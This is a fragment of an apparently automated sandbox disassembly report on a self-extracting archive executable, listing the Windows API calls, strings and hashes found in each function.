                                                              • Opcode Fuzzy Hash: 535933a68a31f37cb438c88139474660aa8a7bc38736e6dbe458ce155981d1f2
                                                              • Instruction Fuzzy Hash: EC41F974A00218AFCF10EF29C880B9EBBB0BF48324F149057E8156B392C7B9DA05CB95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 575bc9ceb7f15b1dc1621cbb7563bec2ef3bea25fb1cda0a4393ad44a68a8235
                                                              • Instruction ID: e835a8c215b35ad694d76d5cb7228d49c9047f66f87a44e887d138fe259faaf2
                                                              • Opcode Fuzzy Hash: 575bc9ceb7f15b1dc1621cbb7563bec2ef3bea25fb1cda0a4393ad44a68a8235
                                                              • Instruction Fuzzy Hash: 98314E6274439566E634AF55BC4377BB3A4EB90320FA0841FF48557380FA5CAD8183AD
                                                              APIs
                                                                • Part of subcall function 0043C868: _free.LIBCMT ref: 0043C891
                                                              • _free.LIBCMT ref: 0043C8F2
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 0043C8FD
                                                              • _free.LIBCMT ref: 0043C908
                                                              • _free.LIBCMT ref: 0043C95C
                                                              • _free.LIBCMT ref: 0043C967
                                                              • _free.LIBCMT ref: 0043C972
                                                              • _free.LIBCMT ref: 0043C97D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: eccb0df0088146588839a7ad01c05d87565d7e7e596d089e85605e738dcf6c34
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: C8114272580704A6E520B772CC47FCBBBAC9F18B09F401C1EB39D76092DA69B6158754
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0042E669,0042E5CC,0042E86D), ref: 0042E605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0042E61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0042E630
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 836358303f2d6d14b0f5dd158502e470ac65d6f4ed247892c9fe264ba39ec6d8
                                                              • Instruction ID: cf7de49a274baa8981350daf9f210a3bf1602dd8e7b0ad4f453bebe734b7f4be
                                                              • Opcode Fuzzy Hash: 836358303f2d6d14b0f5dd158502e470ac65d6f4ed247892c9fe264ba39ec6d8
                                                              • Instruction Fuzzy Hash: 4BF0C2317806329F1F224FAB7C8567762C8AA35B853D0053BD905D7310EB2CCC556AAD
                                                              APIs
                                                              • _free.LIBCMT ref: 0043891E
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 00438930
                                                              • _free.LIBCMT ref: 00438943
                                                              • _free.LIBCMT ref: 00438954
                                                              • _free.LIBCMT ref: 00438965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: pD
                                                              • API String ID: 776569668-1597287149
                                                              • Opcode ID: 5c4ae8a30562b6d1dc3978ebc91aa7d68827e98b3d6e2b8757208c9964f3f6aa
                                                              • Instruction ID: 03c2a37e985825bbcef496d8888ed5af9f0a78ac280f94c56cbaf96aa8560d67
                                                              • Opcode Fuzzy Hash: 5c4ae8a30562b6d1dc3978ebc91aa7d68827e98b3d6e2b8757208c9964f3f6aa
                                                              • Instruction Fuzzy Hash: 5AF03A758102268BCA066F15FE024067BB1FB29B18710256FF11C522B2CBB989819B8D
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004214C2
                                                                • Part of subcall function 0041B146: GetVersionExW.KERNEL32(?), ref: 0041B16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004214E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00421500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00421513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421533
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 8dac6efc1c6a1ef75ccd9cee45fda39f02ebc7c51c1e136b2f5e58ec5b75dd59
                                                              • Instruction ID: eeb30cde17986c4cb7e51f7636d078a4cd193634ddb5d694c486c2cbb0737e96
                                                              • Opcode Fuzzy Hash: 8dac6efc1c6a1ef75ccd9cee45fda39f02ebc7c51c1e136b2f5e58ec5b75dd59
                                                              • Instruction Fuzzy Hash: 6431F879108355ABC700DFA8D88499BB7F8FF98754F404A2EF999C3210E734D549CBAA
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00432AF1,004302FC,0042FA34), ref: 00432B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00432B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00432B2F
                                                              • SetLastError.KERNEL32(00000000,00432AF1,004302FC,0042FA34), ref: 00432B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 871a424ac223a47117cc6b4d863e24e6f94995235399aebfd048fbf3c3e2116d
                                                              • Instruction ID: 38a79b9ca071c79c59eb64fe434f7a39b86427909e52018959ba4c84a5a2139e
                                                              • Opcode Fuzzy Hash: 871a424ac223a47117cc6b4d863e24e6f94995235399aebfd048fbf3c3e2116d
                                                              • Instruction Fuzzy Hash: B20124361083116EA6142F767C8592B7B58EF0AB7AF20233FF110411E0EF99AC00924C
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00451030,00434674,00451030,?,?,00433F73,00000050,?,00451030,00000200), ref: 004397E9
                                                              • _free.LIBCMT ref: 0043981C
                                                              • _free.LIBCMT ref: 00439844
                                                              • SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 00439851
                                                              • SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 0043985D
                                                              • _abort.LIBCMT ref: 00439863
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 5960bcb6f808acea97002157d61883073e2bdf8b18b5ce473b93f42615c9ab79
                                                              • Instruction ID: 3bbc6415f847f71bf7f1705c5ee03622287d3763fab8c1622ccc55d1bbbb0b5c
                                                              • Opcode Fuzzy Hash: 5960bcb6f808acea97002157d61883073e2bdf8b18b5ce473b93f42615c9ab79
                                                              • Instruction Fuzzy Hash: 73F0443915060122C75633267C0AB1B1A358FDBB39F30213FF61892292EFACCC06482D
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0042DC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042DC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042DC72
                                                              • TranslateMessage.USER32(?), ref: 0042DC7C
                                                              • DispatchMessageW.USER32(?), ref: 0042DC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0042DC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: 96d88a7126f1579e0e755e8a53e3e4446dc3760f432d7008fdde1b9e01600351
                                                              • Instruction ID: 9bbd36252c52d1aeea3118ae3683a1622621903e71df04e01831c8b25aa5d019
                                                              • Opcode Fuzzy Hash: 96d88a7126f1579e0e755e8a53e3e4446dc3760f432d7008fdde1b9e01600351
                                                              • Instruction Fuzzy Hash: 1EF03C72A01229BBCB206FA5EC4DDDB7F6DEF42792B004121B50AE2054D6789686C7A4
                                                              APIs
                                                                • Part of subcall function 0042A699: GetDC.USER32(00000000), ref: 0042A69D
                                                                • Part of subcall function 0042A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A6A8
                                                                • Part of subcall function 0042A699: ReleaseDC.USER32(00000000,00000000), ref: 0042A6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0042A83C
                                                                • Part of subcall function 0042AAC9: GetDC.USER32(00000000), ref: 0042AAD2
                                                                • Part of subcall function 0042AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0042AB01
                                                                • Part of subcall function 0042AAC9: ReleaseDC.USER32(00000000,?), ref: 0042AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: "B$($AB
                                                              • API String ID: 1061551593-1345302636
                                                              • Opcode ID: 9664b772ad1abaf588dc054e240f258616e39304a8efe7da5e5b743cb5865df6
                                                              • Instruction ID: cc35fe099237351e593cee8caf56af08e53a1b2617fbdcc64cbb0cfc24adfdb4
                                                              • Opcode Fuzzy Hash: 9664b772ad1abaf588dc054e240f258616e39304a8efe7da5e5b743cb5865df6
                                                              • Instruction Fuzzy Hash: E191FF75608350AFD710DF25D844A2BBBE8FFC9701F00496EF99AD3220DB74A946CB66
                                                              APIs
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                                • Part of subcall function 0041B92D: _wcsrchr.LIBVCRUNTIME ref: 0041B944
                                                              • _wcslen.LIBCMT ref: 0041C197
                                                              • _wcslen.LIBCMT ref: 0041C1DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: 1fefd95b0269de5fee94067bc4ee4b7c132748b40affb0cacc168a8ea11d85a6
                                                              • Instruction ID: 2be4146ed8bd1d84a39e042664329b5d740e88e1600e9ee6d5d49dfb1d1e8e00
                                                              • Opcode Fuzzy Hash: 1fefd95b0269de5fee94067bc4ee4b7c132748b40affb0cacc168a8ea11d85a6
                                                              • Instruction Fuzzy Hash: E04127315C0361A6D731AF649C82ABB77A4EF44748F20494FF9916B282E76C4DC2C39E
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0041BB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0041A275,?,?,00000800,?,0041A23A,?,0041755C), ref: 0041BBC5
                                                              • _wcslen.LIBCMT ref: 0041BC3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 4de969cf18a02f1adc5a023dc66c91bf86d62e2dc61912fef8aebe6a664ff5c9
                                                              • Instruction ID: aaf1f5aa39e59a56dc47922b600c3bd223380aca90264cdb5f318f948633e4c8
                                                              • Opcode Fuzzy Hash: 4de969cf18a02f1adc5a023dc66c91bf86d62e2dc61912fef8aebe6a664ff5c9
                                                              • Instruction Fuzzy Hash: EB41E331540215B6DF21AF21DC41EEB77A9EF44394F10402FF854A3241EB78EED08AE8
                                                              APIs
                                                              • _wcschr.LIBVCRUNTIME ref: 0042CD84
                                                                • Part of subcall function 0042AF98: _wcschr.LIBVCRUNTIME ref: 0042B033
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$CompareString
                                                              • String ID: <$HIDE$MAX$MIN
                                                              • API String ID: 69343711-3358265660
                                                              • Opcode ID: 1fa9a60b121fd13a718294e6bc065b67af59e6ea7426991383d973c2ae30291a
                                                              • Instruction ID: 4bbdfc3777f2cbd88e227c8380bdfe3165eaf774075ddee3f4421dcbe61a9eb3
                                                              • Opcode Fuzzy Hash: 1fa9a60b121fd13a718294e6bc065b67af59e6ea7426991383d973c2ae30291a
                                                              • Instruction Fuzzy Hash: A4318771A002299ADF25DB51EC41FEF73BCEB14354F814167E905E7180EBB89E848F99
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042AAD2
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0042AB01
                                                              • ReleaseDC.USER32(00000000,?), ref: 0042AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease
                                                              • String ID: -B$7B
                                                              • API String ID: 1429681911-4014454294
                                                              • Opcode ID: 2190edd7e4890acf3e5c97d9ac353b96826223f8dc678e0225427d60fae095d3
                                                              • Instruction ID: c89da3e74d56443b2fb1ed08416aaa112beb8efeeaa39c9344ef8e9c546c7170
                                                              • Opcode Fuzzy Hash: 2190edd7e4890acf3e5c97d9ac353b96826223f8dc678e0225427d60fae095d3
                                                              • Instruction Fuzzy Hash: 5B212C72108344EFD3019FA5DC48E6FBFE9FB89352F040829FA49A2124D7319A949B66
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0041B9B8
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • _wcschr.LIBVCRUNTIME ref: 0041B9D6
                                                              • _wcschr.LIBVCRUNTIME ref: 0041B9E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 525462905-3142399695
                                                              • Opcode ID: 00ffccc129d24782079af522487684603f30d00b26f0dbf918b91f72774da9bf
                                                              • Instruction ID: 5f50bfb82f495c9324934c086aeee7004217c7ae9e05696c38ca33ffc1455084
                                                              • Opcode Fuzzy Hash: 00ffccc129d24782079af522487684603f30d00b26f0dbf918b91f72774da9bf
                                                              • Instruction Fuzzy Hash: 8A01F5B3504312799A30AB769C42DABB7ACEE957B4B50440FF544D6282EB28D88182F9
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042B2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0042B2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0042B304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1$xzF
                                                              • API String ID: 445417207-2353342302
                                                              • Opcode ID: f805ebe4dea6d5657e0d8a082914d4901431927f29e16520f49f30ce41aaae79
                                                              • Instruction ID: bfe0d6b6cc80dc0ed3147aa4d5b31e07dcb5c9d99d025e91e76320da202c683f
                                                              • Opcode Fuzzy Hash: f805ebe4dea6d5657e0d8a082914d4901431927f29e16520f49f30ce41aaae79
                                                              • Instruction Fuzzy Hash: B6110832A00228B6DB119F64AC4DFFF376CEF19704F400062FA45B2180C7A8994597FA
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 0042B6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0042B712
                                                              • DeleteObject.GDI32(00000000), ref: 0042B744
                                                              • DeleteObject.GDI32(00000000), ref: 0042B767
                                                                • Part of subcall function 0042A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0042B73D,00000066), ref: 0042A6D5
                                                                • Part of subcall function 0042A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A6EC
